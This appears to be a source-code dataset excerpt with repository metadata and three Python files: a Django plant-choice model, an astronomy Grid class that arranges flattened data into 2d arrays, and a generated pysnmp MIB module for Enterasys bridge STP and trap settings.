blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
eef3b93d6d17e25958c2f4cdb7df664e8e4c68d9
|
7943eb0fc792750bcffee961d544bf013f150de3
|
/src/plantChoices/models.py
|
ffdbb26f6d6e52069fdc6a137324b1ca60c64d09
|
[] |
no_license
|
ZayX0/gardenbuilder-backend
|
633377ebd1606901ce5bdd222972925be17c652f
|
e2bd5b50461c8ec15d3faa4d92fb17858426e40e
|
refs/heads/master
| 2022-12-24T23:06:34.204147
| 2020-10-05T22:28:16
| 2020-10-05T22:28:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 804
|
py
|
from django.db import models
from django.utils.timezone import now
from sections.models import Section
class PlantChoice(models.Model):
    """A selectable plant, identified by genus/species plus common names.

    Uniqueness is enforced on the (species, additional_information) pair
    via ``Meta.unique_together``.
    """
    # Botanical genus and its common name; both required (blank=False).
    genus = models.CharField(max_length=100, blank=False)
    genus_common_name = models.CharField(max_length=100, blank=False)
    # Species and its common name; both required.
    species = models.CharField(max_length=100, blank=False)
    species_common_name = models.CharField(max_length=100, blank=False)
    # Area one plant occupies, in square feet: max_digits=3 /
    # decimal_places=2 allows values 0.00-9.99.
    square_footage = models.DecimalField(
        default=0.25, max_digits=3, decimal_places=2)
    # Square-foot-gardening variant of the footprint, same constraints.
    square_footage_sfg = models.DecimalField(
        default=0.25, max_digits=3, decimal_places=2
    )
    # Free-form notes; NOTE(review): blank not set, so the field is
    # required by forms — confirm that is intended.
    additional_information = models.CharField(max_length=100)

    def __str__(self):
        # Display the genus common name in admin/shell listings.
        return self.genus_common_name

    class Meta:
        # A species may appear more than once only if its
        # additional_information differs.
        unique_together = ("species", "additional_information")
|
[
"dthompson@tcadcentral.org"
] |
dthompson@tcadcentral.org
|
43b7696094bbd9a3218ecfa280404f8e7564d839
|
47fb4e962cf4a2fc85721faea0e7a764f4e443dc
|
/astrogrid/grid.py
|
2859e12b56510f8b5a310469f52c9cc053ef4800
|
[
"MIT"
] |
permissive
|
jesaerys/astrogrid
|
d068e5b626dc3f7065d7bbbee3af98952891cfde
|
a6f7f92058c3b935d7274e97f8633f0b962b7ce8
|
refs/heads/master
| 2016-09-05T16:28:22.372053
| 2014-09-18T18:49:05
| 2014-09-18T18:49:05
| 20,024,189
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,455
|
py
|
"""
================
`astrogrid.grid`
================
Create 2d grids from flattened data.
This module defines the `Grid` class, which takes an unstructured set of
data, performs a user-defined calculation on it, and arranges the results
as a grid of the desired shape. The resulting grid is a 2d ndarray, so it
can easily be processed further, plotted, or written to an image file.
Classes
-------
====== =================================
`Grid` Build a grid from flattened data.
====== =================================
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import numpy as np
class Grid(object):
    """Build a grid from flattened data.

    A grid is defined by a shape, a function, and a list of arguments for
    the grid cells. The grid itself is represented by a 2d ndarray of the
    given shape (the `data_grid` attribute), where the value of each cell
    is computed using the function and the cell's arguments. Grid
    attributes can be modified freely. The grid's data array is only
    updated when the `update` method is called.

    Parameters
    ----------
    shape : tuple
        Initialize the `shape` attribute.
    func : function
        Initialize the `func` attribute.
    args : list
        Initialize the `args` attribute.
    kwargs : list, optional
        Initialize the `kwargs` attribute. Default is a list of empty
        dictionaries equal in length to `args`.
    fill : int or float, optional
        Initialize the `fill` attribute. Default is `np.nan`.
    update : bool, optional
        If True, the grid values are calculated on instantiation. If False
        (default), then the entire grid is set to `fill` until the `update`
        method is called.

    Attributes
    ----------
    shape
        Numbers of rows and columns in the grid.
    nrow
    ncol
    ij
    xy
    edges
    func
        Function that calculates the value of each cell in the grid.
    args
        List of tuples, one per cell, containing the arguments for `func`.
        The tuples are ordered as a list of cells from a flattened grid
        (e.g., `numpy.ravel`). The list is automatically extended with
        Nones if it is too short for the given grid shape, or truncated if
        it is too long.
    kwargs
        Similar to `args`, but a list of dictionaries containing any
        keyword arguments for `func`.
    fill : int or float
        Fallback value to assign a cell if its args or kwargs is None.
    data_list
    data_grid

    Methods
    -------
    update

    """

    def __init__(self, shape, func, args, kwargs=None, fill=np.nan,
                 update=False):
        self.shape = shape
        self.func = func
        self.args = args
        # One empty keyword dict per cell unless the caller supplies them.
        self.kwargs = [{} for _ in args] if kwargs is None else kwargs
        self.fill = fill
        # Initialize every cell to `fill`. BUGFIX: the previous
        # ``np.zeros(shape).ravel() * fill`` only produced `fill` when
        # fill was nan/inf; for any finite fill it silently yielded zeros.
        self._data_list = np.full(int(np.prod(shape)), fill, dtype=float)
        self._data_grid = self._data_list.reshape(shape)
        if update:
            self.update()

    @property
    def nrow(self):
        """Number of rows in the grid."""
        return self.shape[0]

    @property
    def ncol(self):
        """Number of columns in the grid."""
        return self.shape[1]

    @property
    def ij(self):
        """Row and column array coordinates (row and column indices) of the
        cells in the grid.

        """
        return np.indices(self.shape)

    @property
    def xy(self):
        """x and y pixel coordinates of the centers of the cells in the grid.

        The pixel coordinate system places the center of the cell in the
        first row and first column (i,j = 0,0) at x,y = 1,1; the cell's
        outer corner is at x,y = 0.5,0.5.

        """
        # Reverse the (row, col) index pair to (x, y) and shift to
        # 1-based pixel centers.
        return np.indices(self.shape)[::-1] + 1

    @property
    def edges(self):
        """x and y pixel coordinates of the edges of the cells in the grid.

        See `xy` for the definition of the pixel coordinate system.

        """
        # One more edge than cells along each axis; edges sit at
        # half-integer pixel coordinates.
        return np.indices((self.nrow+1, self.ncol+1))[::-1] + 0.5

    @property
    def data_list(self):
        """Grid cell values as a flattened array.

        The order of the cells is the same as `args` and `kwargs`. If a
        cell's argument tuple or keyword dictionary are set to None, then
        the cell's value is set to `fill`.

        This is a read-only attribute because the value in a given cell is
        the result of evaluating a function with a set of arguments.
        Setting a cell's value directly would break this link.

        """
        return self._data_list

    @property
    def data_grid(self):
        """Grid cell values as a 2d array.

        This is a reshaped view of `data_list`.

        """
        return self._data_grid

    def _check_list(self, list_):
        """Fill or trim the list to the proper length."""
        n = self.nrow * self.ncol
        len_list = len(list_)
        if len_list < n:
            # Pad with None; `_wrap_func` maps None entries to `fill`.
            list_ = list_ + [None]*(n - len_list)
        elif n < len_list:
            list_ = list_[:n]
        return list_

    def _check_data(self, arr):
        """Fill or trim the array to the proper length."""
        n = self.nrow * self.ncol
        len_arr = arr.size
        if len_arr < n:
            arr = np.append(arr, [self.fill]*(n - len_arr))
        elif n < len_arr:
            arr = arr.copy()[:n]
        else:
            # Always copy so existing references to the old data are
            # not mutated by the update.
            arr = arr.copy()
        return arr

    def _wrap_func(self):
        """Wrap self.func so that it returns self.fill when provided with
        None.

        """
        def wrapper(args, kwargs):
            if args is None or kwargs is None:
                val = self.fill
            else:
                val = self.func(*args, **kwargs)
            return val
        return wrapper

    def _apply_func(self, where=None):
        """Update the values in the data array at the given indices.

        See `update` for the `where` keyword.

        """
        func = self._wrap_func()
        if hasattr(where, 'dtype') and where.dtype == bool:
            where = np.where(where)  # get indices from boolean array
        if where is None:
            # BUGFIX: was `xrange`, a Python-2-only builtin, which raised
            # NameError on Python 3 despite the __future__ imports.
            i_list = range(self.nrow*self.ncol)
        elif len(where) == 2 and hasattr(where[0], '__len__'):
            # get flat indices from row,col indices
            i_list = np.ravel_multi_index(where, self.shape)
        else:
            i_list = where
        for i in i_list:
            self._data_list[i] = func(self.args[i], self.kwargs[i])

    def update(self, where=None):
        """Update the grid to the values of the current attributes.

        The grid data array is always copied before updating, thus breaking
        any references to `data_list` and `data_grid`.

        Parameters
        ----------
        where : list, optional
            A list of indices specifying which cells to update, as either a
            list of indices for the flattened grid or a list containing a
            list of row indices followed by a list of column indices. All
            cells are updated if None (default).

        Returns
        -------
        None

        """
        # Normalize args/kwargs/data lengths to the current shape before
        # evaluating any cells.
        self.args = self._check_list(self.args)
        self.kwargs = self._check_list(self.kwargs)
        self._data_list = self._check_data(self._data_list)
        self._apply_func(where=where)
        self._data_grid = self._data_list.reshape(self.shape)
|
[
"jacob.simones@gmail.com"
] |
jacob.simones@gmail.com
|
85934a1752f5ac64318bcca6e3543510617b2dfb
|
85a9ffeccb64f6159adbd164ff98edf4ac315e33
|
/pysnmp/ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB.py
|
373236694ab14c69e20100207467dd0e3afbd94d
|
[
"Apache-2.0"
] |
permissive
|
agustinhenze/mibs.snmplabs.com
|
5d7d5d4da84424c5f5a1ed2752f5043ae00019fb
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
refs/heads/master
| 2020-12-26T12:41:41.132395
| 2019-08-16T15:51:41
| 2019-08-16T15:53:57
| 237,512,469
| 0
| 0
|
Apache-2.0
| 2020-01-31T20:41:36
| 2020-01-31T20:41:35
| null |
UTF-8
|
Python
| false
| false
| 26,359
|
py
|
#
# PySNMP MIB module ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 18:49:14 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
# NOTE: `mibBuilder` is not defined in this file; pysmi-generated MIB
# modules are executed by the pysnmp MIB loader, which injects it into the
# module namespace at load time.
# Pull in the base ASN.1 types and constraint classes.
ObjectIdentifier, Integer, OctetString = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "Integer", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, SingleValueConstraint, ConstraintsIntersection, ConstraintsUnion, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "SingleValueConstraint", "ConstraintsIntersection", "ConstraintsUnion", "ValueRangeConstraint")
# Objects from the standard bridge MIBs that this extension augments or
# references in notifications.
dot1dBasePort, dot1dStpDesignatedRoot, dot1dBasePortEntry, dot1dStpPortEntry, dot1dStpPort, dot1dBasePortIfIndex, dot1dBaseBridgeAddress = mibBuilder.importSymbols("BRIDGE-MIB", "dot1dBasePort", "dot1dStpDesignatedRoot", "dot1dBasePortEntry", "dot1dStpPortEntry", "dot1dStpPort", "dot1dBasePortIfIndex", "dot1dBaseBridgeAddress")
etsysModules, = mibBuilder.importSymbols("ENTERASYS-MIB-NAMES", "etsysModules")
EnabledStatus, = mibBuilder.importSymbols("P-BRIDGE-MIB", "EnabledStatus")
dot1qTpFdbPort, = mibBuilder.importSymbols("Q-BRIDGE-MIB", "dot1qTpFdbPort")
# SMI/conformance scaffolding and textual conventions.
NotificationGroup, ModuleCompliance, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance", "ObjectGroup")
Integer32, NotificationType, Gauge32, Bits, Counter32, MibIdentifier, TimeTicks, iso, ObjectIdentity, Unsigned32, IpAddress, Counter64, MibScalar, MibTable, MibTableRow, MibTableColumn, ModuleIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "Integer32", "NotificationType", "Gauge32", "Bits", "Counter32", "MibIdentifier", "TimeTicks", "iso", "ObjectIdentity", "Unsigned32", "IpAddress", "Counter64", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ModuleIdentity")
TextualConvention, DisplayString, TruthValue = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString", "TruthValue")
# Module identity rooted at the Enterasys enterprise OID
# 1.3.6.1.4.1.5624.1.2.31, with its full revision history.
etsysIetfBridgeMibExtMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31))
etsysIetfBridgeMibExtMIB.setRevisions(('2007-07-31 18:19', '2007-03-21 21:02', '2006-11-09 16:37', '2006-10-04 19:51', '2004-11-04 14:47', '2004-05-28 15:08', '2004-04-08 20:04', '2004-03-04 19:39', '2004-03-01 22:29', '2003-11-14 18:31', '2003-06-19 19:36', '2002-12-13 21:20',))
# DESCRIPTION-style texts are only attached when the builder was asked to
# load them (mibBuilder.loadTexts), to keep memory use down otherwise.
if mibBuilder.loadTexts: etsysIetfBridgeMibExtMIB.setLastUpdated('200707311819Z')
if mibBuilder.loadTexts: etsysIetfBridgeMibExtMIB.setOrganization('Enterasys Networks, Inc')
# OID subtree layout: one MibIdentifier node per functional area of the
# extension (STP, base bridge, dot1q, SpanGuard, BackupRoot, LoopProtect,
# and the .0 notifications arc).
etsysIetfBridgeMibExt = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1))
etsysIetfBridgeDot1dStp = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 1))
etsysIetfBridgeDot1dBase = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 2))
etsysIetfBridgeDot1qBase = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 3))
etsysIetfBridgeDot1dSpanGuard = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 4))
etsysIetfBridgeDot1dBackupRoot = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 5))
etsysIetfBridgeDot1dLoopProtect = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 6))
etsysIetfBridgeDot1Notifications = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 0))
# --- STP port table: augments BRIDGE-MIB dot1dStpPortEntry with per-port
# --- STP enable, SpanGuard blocking state, CIST role and non-forwarding
# --- reason columns.
etsysIetfBridgeDot1dStpPortTable = MibTable((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 1, 1), )
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpPortTable.setStatus('current')
etsysIetfBridgeDot1dStpPortEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 1, 1, 1), )
# Register this row as an AUGMENTS of dot1dStpPortEntry and reuse its
# index columns so both tables share the same instance identifiers.
dot1dStpPortEntry.registerAugmentions(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpPortEntry"))
etsysIetfBridgeDot1dStpPortEntry.setIndexNames(*dot1dStpPortEntry.getIndexNames())
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpPortEntry.setStatus('current')
etsysIetfBridgeDot1dStpPortStpEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 1, 1, 1, 1), EnabledStatus().clone('enabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpPortStpEnable.setStatus('current')
etsysIetfBridgeDot1dStpPortSpanGuardBlocking = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 1, 1, 1, 2), TruthValue().clone('false')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpPortSpanGuardBlocking.setStatus('current')
etsysIetfBridgeDot1dStpPortCistRoleValue = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 1, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("disabled", 1), ("root", 2), ("designated", 3), ("alternate", 4), ("backUp", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpPortCistRoleValue.setStatus('current')
etsysIetfBridgeDot1dStpPortCistNonForwardingReason = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 1, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("none", 1), ("disputed", 2), ("spanGuardLocked", 3), ("loopProtectEvent", 4), ("loopProtectAdvisory", 5), ("loopbackDetected", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpPortCistNonForwardingReason.setStatus('current')
# --- Bridge-wide STP scalars: trap enables and the bridge-priority
# --- encoding default.
etsysIetfBridgeDot1dStpTopChangeTrapEnable = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2), ("edgePortDisabled", 3))).clone('enabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpTopChangeTrapEnable.setStatus('current')
etsysIetfBridgeDot1dStpNewRootTrapEnable = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 1, 3), EnabledStatus().clone('enabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpNewRootTrapEnable.setStatus('current')
etsysIetfBridgeDot1dStpBridgePriorityDefault = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("stp8021d1998", 1), ("stp8021t2001", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpBridgePriorityDefault.setStatus('current')
# --- SpanGuard scalars (enable, trap enable, block time in seconds).
etsysIetfBridgeDot1dStpSpanGuardEnable = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 4, 1), EnabledStatus().clone('disabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpSpanGuardEnable.setStatus('current')
etsysIetfBridgeDot1dStpSpanGuardTrapEnable = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 4, 2), EnabledStatus().clone('disabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpSpanGuardTrapEnable.setStatus('current')
etsysIetfBridgeDot1dStpSpanGuardBlockTime = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 4, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(ValueRangeConstraint(0, 0), ValueRangeConstraint(1, 65535), ))).setUnits('seconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpSpanGuardBlockTime.setStatus('current')
# --- BackupRoot scalars.
etsysIetfBridgeDot1dStpBackupRootEnable = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 5, 1), EnabledStatus().clone('disabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpBackupRootEnable.setStatus('current')
etsysIetfBridgeDot1dStpBackupRootTrapEnable = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 5, 2), EnabledStatus().clone('disabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpBackupRootTrapEnable.setStatus('current')
# --- LoopProtect per-port table (also augments dot1dStpPortEntry) plus
# --- its event-threshold/window/trap scalars.
etsysIetfBridgeDot1dStpLoopProtectPortTable = MibTable((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 6, 1), )
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpLoopProtectPortTable.setStatus('current')
etsysIetfBridgeDot1dStpLoopProtectPortEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 6, 1, 1), )
dot1dStpPortEntry.registerAugmentions(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpLoopProtectPortEntry"))
etsysIetfBridgeDot1dStpLoopProtectPortEntry.setIndexNames(*dot1dStpPortEntry.getIndexNames())
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpLoopProtectPortEntry.setStatus('current')
etsysIetfBridgeDot1dStpLoopProtectPortCistEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 6, 1, 1, 1), EnabledStatus().clone('disabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpLoopProtectPortCistEnable.setStatus('current')
etsysIetfBridgeDot1dStpLoopProtectPortCistBlocking = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 6, 1, 1, 2), TruthValue().clone('false')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpLoopProtectPortCistBlocking.setStatus('current')
etsysIetfBridgeDot1dStpLoopProtectPortPartnerCapable = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 6, 1, 1, 3), TruthValue().clone('false')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpLoopProtectPortPartnerCapable.setStatus('current')
etsysIetfBridgeDot1dStpLoopProtectEventThreshold = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 6, 2), Unsigned32().clone(3)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpLoopProtectEventThreshold.setStatus('current')
etsysIetfBridgeDot1dStpLoopProtectEventWindow = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 6, 3), Unsigned32().clone(180)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpLoopProtectEventWindow.setStatus('current')
etsysIetfBridgeDot1dStpLoopProtectEventTrapEnable = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 6, 4), EnabledStatus().clone('disabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpLoopProtectEventTrapEnable.setStatus('current')
# --- Base-port table: per-port new-learned/moved address trap enables,
# --- augmenting BRIDGE-MIB dot1dBasePortEntry.
etsysIetfBridgeDot1dBasePortTable = MibTable((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 2, 1), )
if mibBuilder.loadTexts: etsysIetfBridgeDot1dBasePortTable.setStatus('current')
etsysIetfBridgeDot1dBasePortEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 2, 1, 1), )
dot1dBasePortEntry.registerAugmentions(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dBasePortEntry"))
etsysIetfBridgeDot1dBasePortEntry.setIndexNames(*dot1dBasePortEntry.getIndexNames())
if mibBuilder.loadTexts: etsysIetfBridgeDot1dBasePortEntry.setStatus('current')
etsysIetfBridgeDot1dBasePortNewLearnedAddrTrap = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 2, 1, 1, 1), EnabledStatus().clone('disabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dBasePortNewLearnedAddrTrap.setStatus('current')
etsysIetfBridgeDot1dBasePortMovedAddrTrap = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 2, 1, 1, 2), EnabledStatus().clone('disabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dBasePortMovedAddrTrap.setStatus('current')
# --- dot1q scalars.
etsysIetfBridgeDot1qNewLearnedAddrTrapEnable = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 3, 1), EnabledStatus().clone('disabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1qNewLearnedAddrTrapEnable.setStatus('current')
etsysIetfBridgeDot1qMovedAddrTrapEnable = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 3, 2), EnabledStatus().clone('disabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1qMovedAddrTrapEnable.setStatus('current')
etsysIetfBridgeDot1qStaticUcastAsMcast = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 3, 3), EnabledStatus().clone('disabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1qStaticUcastAsMcast.setStatus('current')
# --- Notifications under the .0 arc, each carrying its variable bindings.
etsysIetfBridgeDot1qFdbNewLearnedAddr = NotificationType((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 0, 1)).setObjects(("Q-BRIDGE-MIB", "dot1qTpFdbPort"))
if mibBuilder.loadTexts: etsysIetfBridgeDot1qFdbNewLearnedAddr.setStatus('current')
etsysIetfBridgeDot1dSpanGuardPortBlocked = NotificationType((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 0, 2)).setObjects(("BRIDGE-MIB", "dot1dBasePort"), ("BRIDGE-MIB", "dot1dBasePortIfIndex"))
if mibBuilder.loadTexts: etsysIetfBridgeDot1dSpanGuardPortBlocked.setStatus('current')
etsysIetfBridgeDot1dBackupRootActivation = NotificationType((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 0, 3)).setObjects(("BRIDGE-MIB", "dot1dBaseBridgeAddress"), ("BRIDGE-MIB", "dot1dStpDesignatedRoot"))
if mibBuilder.loadTexts: etsysIetfBridgeDot1dBackupRootActivation.setStatus('current')
etsysIetfBridgeDot1qFdbMovedAddr = NotificationType((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 0, 4)).setObjects(("Q-BRIDGE-MIB", "dot1qTpFdbPort"))
if mibBuilder.loadTexts: etsysIetfBridgeDot1qFdbMovedAddr.setStatus('current')
etsysIetfBridgeDot1dCistLoopProtectEvent = NotificationType((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 0, 5)).setObjects(("BRIDGE-MIB", "dot1dStpPort"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpLoopProtectPortCistBlocking"))
if mibBuilder.loadTexts: etsysIetfBridgeDot1dCistLoopProtectEvent.setStatus('current')
# --- Conformance subtree roots.
etsysIetfBridgeConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2))
etsysIetfBridgeGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1))
etsysIetfBridgeCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 2))
# --- Object/notification groups and module compliances. The repeated
# --- `if getattr(mibBuilder, 'version', ...) > (4, 4, 0)` guards call
# --- setStatus only on pysnmp builds newer than 4.4.0, where the
# --- group/compliance classes support it.
etsysIetfBridgeStpPort = ObjectGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 1)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpPortStpEnable"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    etsysIetfBridgeStpPort = etsysIetfBridgeStpPort.setStatus('current')
etsysIetfBridgeStpTrap = ObjectGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 2)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpTopChangeTrapEnable"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpNewRootTrapEnable"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    etsysIetfBridgeStpTrap = etsysIetfBridgeStpTrap.setStatus('current')
etsysIetfBridgeBase = ObjectGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 3)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1qNewLearnedAddrTrapEnable"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dBasePortNewLearnedAddrTrap"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    etsysIetfBridgeBase = etsysIetfBridgeBase.setStatus('current')
etsysIetfBridgeDot1qFdbNewAddrNotification = NotificationGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 4)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1qFdbNewLearnedAddr"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    etsysIetfBridgeDot1qFdbNewAddrNotification = etsysIetfBridgeDot1qFdbNewAddrNotification.setStatus('current')
